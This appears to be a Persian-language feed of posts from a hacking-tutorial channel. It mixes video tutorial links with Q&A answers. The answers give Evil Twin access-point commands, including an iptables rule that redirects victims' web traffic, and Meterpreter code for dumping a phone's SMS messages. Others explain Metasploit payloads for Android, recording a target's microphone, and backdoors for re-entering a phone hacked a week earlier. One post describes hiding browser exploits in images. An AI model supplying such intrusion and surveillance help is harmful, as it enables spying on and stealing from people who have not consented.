از نگاه احسان

🖥 آموزش تصویری ابزار BeEF ابزار BeEF یا The Browser Exploitation Framework در دسته ابزار هایی قرار دارد که در تست نفوذ استفاده می شود. این ابزار توسط زبان روبی نوشته شده و بر اجرای حملات سمت کاربر(Client-side) در مقال مرورگر های وب پرکاربرد است. در ویدیو زیر به نحوه کار با این ابزار در کالی لینوکس آشنا خواهید شد. #beef #kali https://goo.gl/V07cok @PentesterSchool

اکسپلویت نویسی امنیت سرور مهندسی معکوس اخرین متود های تست نفوذ @HackerOne

❔چند تا سوال درباره دستورات روش Evil Twin❔ 💭 در این بحث شرکت کنید : https://goo.gl/LI2Pds ❓سوال❓ با عرض سلام خسته نباشید حین دنبال کردن آموزش های شما و تمرین برای تست و نفوذ به چند دستور بر خوردم که کاربردشون رو ب طور کامل متوجه نشدم. ممنون میشم یک سری توضیحات مختصر در باره ی کاربرد دستورات زیر بدید ۱-dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0 ۲-route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ۳-echo 1 > /proc/sys/net/ipv4/ip_forward ۴-iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE ۵-iptables –append FORWARD –in-interface at0 -j ACCEPT ۶-iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.4:80 (در این مورد اگه بخوام همه ی پورت ها رو شامل بشه چیکار باید کنم فقط پورت ۸۰ نباشه ۸۰۸۰ و سایر پورت هایی که برای چت کردن هم استفاده میشه رو شامل شه) ۷- iptables -t nat -A POSTROUTING -j MASQUERADE ✅ پاسخ ✅ سلام دوست من ، توضیح تمامی دستور ها و کاربردشون رو اگر بخوام بهتون کامل بگم در حد چند صفحه میشه تا کامل متوجه بشوید. اما به صورت کلی بهتون میگم که جریان چی هستش.. در دستور اول شما فایل کانفیگ و pid سرویس dhcp رو معرفی می کنید تا این سرویس براتون قابل استفاده بشه ( اگر در مورد کاربرد این سرویس اطلاعی ندارید جستجویی داشته باشید..) سپس با دستور های بعدی کاری می کنید که اگر کلاینتی به شبکه شما متصل شد ، ۱- IP Address ای به او تعلق گیرد. ۲- کلیه packet هایی که در شبکه ارسال می شود به شما فرستاده شود. اگر توضیحات جزئی این دستورات رو می خواهید می بایست نگاهی به راهنمای کامل آن ها بیاندازید به همین منظور براتون لینک هایی رو قرار دادم ، مطالعه فرمایید: http://linux.die.net/man/5/dhcpd.conf http://www.netfilter.org/documentation/ http://serverfault.com/questions/248841/ip-forwarding-when-and-why-is-this-required/248845 http://www.linuxquestions.org/questions/linux-security-4/prerouting-and-postrouting-887333/ همچنین ، برای اون بخشی که گفتید می خواهید اطلاعات بقیه پورت هام براتون ارسال بشه کافیه شماره پورت رو در دستور iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.4:80 عوض کنید. #questions @PentesterSchool

❔هک اندروید با دادن لینک توسط کالی لینوکس❔ 💭 در این بحث شرکت کنید : https://goo.gl/pO7f0M ❓سوال❓ سلام به همه بنده با استفاده از متااسپلویت و ساخت پیلود میتونم به اندروید نفوذ کنم میخواستم بدونم امکانش هست که بشه از طریق لینک هم به اندروید نفوذ کرد؟ یعنی یه لینک بسازیم و بدیم به تارگت. همین که تارگت لینک رو باز کردی بشه بهش نفوذ کرد ممنون میشم اگه راهنمایی کنید ✅ پاسخ ✅ سلام ، باید دنبال اکسپلویت های مربوطه توی سایت های اکسپلویت باشید. نگاهی به این اکسپلویت بیاندازید : https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface #questions @PentesterSchool

❔مشکل در اجرای دستور sms_dump❔ 💭 در این بحث شرکت کنید : https://goo.gl/j54ZV5 ❓سوال❓ سلام میخاستم ببینم چرا وقتی این دستور رو تایپ میکنم unknown commandمیده http://uupload.ir/files/t791_virtualbox_linux_debian_07_07_2016_11_19_05.png ✅ پاسخ ✅ سلام ، برای حل این مشکل می تونید متاسپلویت خودتون رو آپدیت کنید یا این مراحل رو طی کنید: فایل lib/rex/post/meterpreter/extensions/android/android.rb رو باز کنید و در خط ۴۴ به بعد این کد ها رو اضافه کنید : def dump_sms sms = Array.new request = Packet.create_request('dump_sms') response = client.send_request(request) response.each( TLV_TYPE_SMS_GROUP ) { |p| sms << { 'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value), 'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value), 'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish, 'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value), 'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value) } } return sms end #questions @PentesterSchool

🖥آموزش پیدا کردن Admin page در کالی لینوکس در این ویدیو یاد میگیرد که چگونه Admin Page را با استفاده از ابزار Dirbuster درکالی لینوکس پیدا کنید. @Linux @Dirbuster @AdminPage https://www.pentesterschool.ir/tutorials/english/kali-linux/finding-admin-page-using-dirbuster-on-kali-linux-2-0

❔ایا برای هک حتما باید از لینوکس استفاده کرد؟❔ 💭 در این بحث شرکت کنید : https://goo.gl/DU2T52 ❓سوال❓ سلام وعرض خسته نباشید برای این که هک رو یاد بگیرم حتما باید لینوکس بلد باشم و از لینوکس جای ویندوز استفاده کنم؟ نمیشه بدون لینوکس هک کرد؟ ممنون ✅ پاسخ ✅ سلام ، یادگیری لینوکس یکی از عناصر مهم و تاثیر گذار هست. این تاثیر از چند جنبه روی دانش شما تاثیر میگذاره. ابتدا باید در نظر بگیرید که در حال حاضر اکثر سایت ها چه خارج و چه در داخل کشور میزبانی لینوکسی دارند. ( حال توزیع های مختلفی استفاده می شود ) بنابراین اگر شما بخواهید چه به عنوان توسعه دهنده وب و چه به عنوان هکر فعالیت کنید باید حتما با آن آشنایی داشته باشید. اما اینکه آیا از لینوکس باید به عنوان سیستم عامل اصلی استفاده کرد یا خیر باید بگویم که شما ملزم به استفاده از لینوکس به عنوان سیستم عامل اصلی نیستید. گاهی اوقات برایتان پیش میاد که اکثر اوقاتی که پشت سیستم هستید رو صرف یادگیری و استفاده از لینوکس می کنید. یعنی به گونه ای شده که لینوکس یک چیز جدانشدنی برای شما شده ، در چنین شرایطی استفاده از لینوکس به عنوان سیستم عامل اصلی بسیار مناسب است. اما گاهی اوقات شما فقط می خواهید ابزاری خاص ، یا کاربردی خاص از آن را یاد بگیرید. در چنین شرایطی هم می توانید با روش های موجود اون ابزار که حالا برای مثال در کالی لینوکس هست رو توی ویندوز نصب کنید یا از طریق نرم افزار های مجازی ساز مانند vmware اقدام به نصب و استفاده از سیستم عامل به صورت مجازی در کنار سیستم عامل اصلی بکنید. #questions @PentesterSchool

🖥 آموزش Maltego – قسمت آخر در این ویدیو یاد می گیرید که به چه شکل قدرت ابزار Maltego را با ساخت transoform های شخصی سازی شده با بهره گیری از Transform های محلی و TDS افزایش دهید. #maltego https://www.pentesterschool.ir/tutorials/english/maltego/maltego-for-beginners/maltego-05 @PentesterSchool

❔مشکل در استفاده از چند دستور متاسپلویت در هک اندروید با msfconsle❔ 💭 در این بحث شرکت کنید : https://goo.gl/7HPSLg ❓سوال❓ سلام خدمت اساتید من یک مشکل در اجرای دستور record_mic و search داشتم ! نحوه استفاده کامل از این دورو اگه بگید ممنون میشم در ضمن تو محیط msfconsole میشه فایل مخربی که نوشتیم روی یه پروسس دیگه migrate کنیم؟ ✅ پاسخ ✅ سلام ، برای قسمت migrate وقتی از طریق مترپرتر اینکار رو کرده باشید ، فقط با اجرای هر چیزی که می خواهید تحت عنوان اسکریپت مترپرتر می تونید کد های خودتون رو توی اون پروسس اجرا کنید.(به زبان خیلی ساده) کار با record_mic خیلی سادست. کافیه که با اسکریپت ها در متاسپلویت آشنا باشید. اگر با اسکریپت ها در متاسپلویت آشنا نیستید ، دوره آموزشی متاسپلویتی که توی سایت هست رو مشاهده کنید. ابتدا ماژول رو که در مسیر post/multi/manage/record_mic هست ، انتخاب کنید و سپس بعد از تنظیم Session مترپرتر اجراش کنید، به همین سادگی. برای کار کردن با سرچ هم منظورتون چیه ، کار کردن با سرچ در مترپرتر برای پیدا کردن فایل یا کار کردن با سرچ متاسپلویت برای پیدا کردن ماژول؟ اگر گزینه دوم مد نظر شماست در دوره آموزشی متاسپلویت کار کردن با سرچ نیز آموزش داده شده است. اما اگر می خواهید با سرچ مترپرتر کار کنید. شرایط مختلفی رو می تونید پیش رو داشته باشید. توضیحات زیر رو ببینید : meterpreter > search -h Usage: search [-d dir] [-r recurse] -f pattern Search for files. OPTIONS: -d The directory/drive to begin searching from. Leave empty to search all drives. (Default: ) -f The file pattern glob to search for. (e.g. *secret*.doc?) -h Help Banner. -r Recursivly search sub directories. (Default: true) #questions @PentesterSchool

🖥 آموزش اسکنر Vega در کالی لینوکس ۲.۰ در این ویدیو یاد می گیرید که به شکل از اسکنر Vega به منظور اسکن وب سایت ها در کالی لینوکس ۲.۰ استفاده کنید. #kali #vega https://goo.gl/Dx6uqR @PentesterSchool

📝 چگونه کامپیوتری ایمن داشته باشیم؟ یکی از دغدغه های همه ما اینه که چگونه امنیت سیستم شخصی خودمون رو تامین کنیم. برای اینکه هکری موفق ، توسعه دهنده یا برنامه نویسی موفق باشیم باید از امنیت کامپیوتر شخصی خودمون در مقابل انواع بدافزار ها محافظت کنیم. در این مطلب می خواهیم کمی در مورد تامین امنیت سیستم های شخصیمون بدونیم و راهکار هایی برای مقابله با انواع تهدید را بیان کنیم. #security #articles #crypting https://goo.gl/F0JVQy @PentesterSchool

🖥 آموزش کامل Maltego – قسمت چهارم در این ویدیو یاد میگیرید که به شکل از Maltego به منظور پیدا کردن لینک هایی از هدف هایتان ، در شبکه های اجتماعی استفاده کنید. #maltego https://goo.gl/LFY2Uo @PentesterSchool

🆔دوستان عزیز برای ارائه پیشنهاد ، انتقاد می تونند با آی دی @prot3ct0r در ارتباط باشند.🆔 #contact

❔جستجوی وای فای ها در vmware❔ 💭 در این بحث شرکت کنید : https://goo.gl/PuvKYy ❓سوال❓ باسلام یه مشکل من میخام بدونم که چطور کارت وایرلسم رو به wm ware تعریف کنم تا توی کالی بتونم وای فای هارو سرچ کنم اموزش فعال کردن وایرلس رو توی کالی نمیخام ✅ پاسخ ✅ سلام دوست من ، برای این منظور میبایست کارت شبکه وایرلس اکسترنال تهیه کنید و آن را به ماشین مجازی خودتون متصل کنید. که بدین منظور پس از تهیه و وصل کارت وایرلس به کامپیوتر اتون وارد منوی VM->Removable Devices->{Your Wireless Card} می شوید و آن را اکتیو می کنید. حال می توانید از کارت شبکه وایرلس در ماشین مجازی استفاده کنید. نکته: اگر قصد تهیه کارت شبکه وایرلس اکسترنال را ندارید می توانید از کالی لینوکس به صورت Live استفاده کنید. برای اجرای زنده کالی لینوکس ( بدون نصب ) این آموزش رو مشاهده کنید: https://goo.gl/iDwsZC #questions @PentesterSchool

❔چند تا سوال درباره هک اندروید با متاسپلویت❔ ❓سوال❓ باسلام و خسته نباشید چند تا سوال داشتم!!!! سوال اول:هنگام ساخت پیلود اجرایی نسخه اندروید در قسمت lhost باید ای پی لوکال وارد بشه یا ای پی public???? سوال دوم:هنگام ست کردن lhost در متاسپلویت باید اپی لوکال وارد بشه یا ای پی پابلیک؟؟؟؟——>فکر کنم باید هر ای پی رو که توی پیلود دادیم باید بهش بدیم سوال سه:توی کالی بنده بعد ست کردن lhost و بقیه کار هنگام اکسپلویت کردن اول این ارور رو میده بعدش شروع میکنه به گوش دادن و به خاطر این ارور به تارگت وصل نمیشه!!!تارگت پیلود رو اجرا میکنه!—->هنگامی که توی ست کردن lhost ای پی پابلیک رو میزنم این ارور رو میده ولی ای پی لوکال رو میزنم اروری وجود نداره ارور اینه:faild to bind…… سوال چهار:راهی هست که بشه کاری کرد که مثلا طرف رو هک کردیم یه هفته پیش طرف هم پیلود رو حذف نکرده میشه کاری کرد که پیلود رو دوباره صدازد وطرف رو دوباره هک کرد؟؟؟ سوال پنجم:اموزش عوض کردن ای پی public سوال ششم:اگه هنگام ساخت پیلود ای پی لوکال رو هم بزنیم بازم پیلود کار میکنه؟؟؟؟؟ ممنون با تشکر. ✅ پاسخ ✅ سلام ، پاسخ سوال شماره ۱ : آی پی آدرس پابلیک باید وارد بشه پاسخ سوال شماره ۲ : آی پی آدرس لوکال باید وارد بشه – خیر ، توی این قسمت listener ساخته میشه و listener فقط روی Local IP قابل bind هست. پاسخ سوال شماره ۳ : علت این مشکل این هست که روی listener آی پی غیر از لوکال تنظیم کردید و نمیتونه bind کنه. پاسخ سوال شماره ۴ : برای این موضوع باید از بکدور بزنید که ماژول هایی آماده از مترپرتر / Meterpreter برای اینکار هست. در دوره آموزشی متاسپلویت کار با Meterpreter رو یاد بگیرید. پاسخ سوال شماره ۵ : آدرس آی پی پابلیک معمولا داینامیک هست با یک بار خاموش و روشن کردن مودم می تونید آدرس آی پی تون رو تغییر بدید. اما اگر می خواهید بازه ادرس آی پی تون رو به تغییر بدید می تونید از سرویس های Proxy استفاده کنید. پاسخ سوال شماره ۶ : موقع ساخت پیلود اگر آی پی لوکال بزنید فقط توی شبکه محلی خودتون کار میکنه و روی کلاینت های بیرون شبکه کار نمیکنه. #questions 💭 در این بحث شرکت کنید : https://goo.gl/pYz5Vs @PentesterSchool

عید سعید فطر مبارک :)

☑️ ابزار Stegosploit - حمل اکسپلویت با استفاده از پنهان نگاری و Polyglot ها ☑️ توضیحات : 📌جعبه ابزار Stegosploit راهی جدید برای رمزنگاری اکسپلویت های “Drive-by” مرورگر ایجاد میکند و آنها را با استفاده از فایل های تصویری حمل میکند و انتقال میدهد. این پیلود ها در حال حاضر با استفاده از ابزار های موجود غیر قابل شناسایی هستند. 📌در این گفتگو دو روش اساسی حمل اکسپلویت با استفاده از عکس ها، نهان نگاری و polyglot ها مورد بحث و گفتگو قرار خواهند گرفت. اکسپلویت های مرورگر Drive-by در فایل های JPG و PNG نهان نگاری می شوند 📌عکس بدست آمده با دیکدر HTML و JAVASCRIPT دیکد میشود و تبدیل به یک polyglot عکس+html میشود. 📌خروجی Polyglot بدست آمده دقیقا مانند یک عکس رفتار میکند اما در مرورگر قربانی، پس از بارگزاری دیکد میشود و رفتار واقعی خود را نشان میدهد. 📌ابزار Stegosploit v0.3 که با پیشرفت هایی از نسخه ۰.۲ منتشر میشود ابزار های ضروری برای تست حمل اکسپلویت با استفاده از عکس را با خود دارد. #blackhat_group #stegosploit https://goo.gl/sSeItx @PentesterSchool

❔اجرای خودکار مرور گر هنگام اتصال به اکسس پوینت❔ ❓سوال❓ با سللام و خسته نباشید آیا راهی هست که به محض اتصال قربانی به یک اکسس پوینت جعلی یک صفحه ی وب از قبل آماده شده واسش به نمایش در بیاد؟ بدون اینکه حتی مرورگرشو باز کنه؟! ✅ پاسخ ✅ سلام ، برای این منظور حتما باید دسترسی از سیستم طرف داشته باشید از طریق شبکه نمی تونید برنامه ای رو اجرا کنید. فقط میتونید توی شبکه کاری کنید اگر خواست سایتی باز کنه صفحه مورد در نظر شما باز شود. #questions 💭 در این بحث شرکت کنید : https://goo.gl/ZIWA3v @PenesterSchool

❔بدست آوردن رنج آی پی wifi بدون وصل شدن به آن❔ ❓سوال❓ با سلام یک سوالی برام پیش آمده ممنون میشم جوابمو بدید آیا راهی هست که بتونم رنج آی پی یک شبکه وایرلسی که رمزشو نمی دونم بدست بیارم؟؟ مثلا از طریق اسنیف بسته ها یا هر راه دیگه؟ ✅ پاسخ ✅ سلام به طور ساده این کار غیر ممکن هست و باید حتما به اون شبکه وصل شده باشید. این اتفاق به این دلیل میافتد که تکنولوژی wifi از استاندارد IEEE 802.11 استفاده می کند که بر اساس لایه ۱ و ۲ مدل OSI کار می کند در نتیجه شما نمی تونید به لایه ۳ دسترسی داشته باشید. #questions 💭 در این بحث شرکت کنید : https://goo.gl/jHK4XR @PenesterSchool

🖥 آموزش کامل Maltego – قسمت سوم در این ویدیو یاد میگیرید که به چه شکل داده ها را از فایل های CSV و XLS به Maltego وارد و مستقیما از آن ها یک Graph بسازید. در این آموزش از اطلاعاتی که از طریق Airodump بدست آمده ، استفاده می شود. #maltego #information_gathering https://goo.gl/GYzecb @PentesterSchool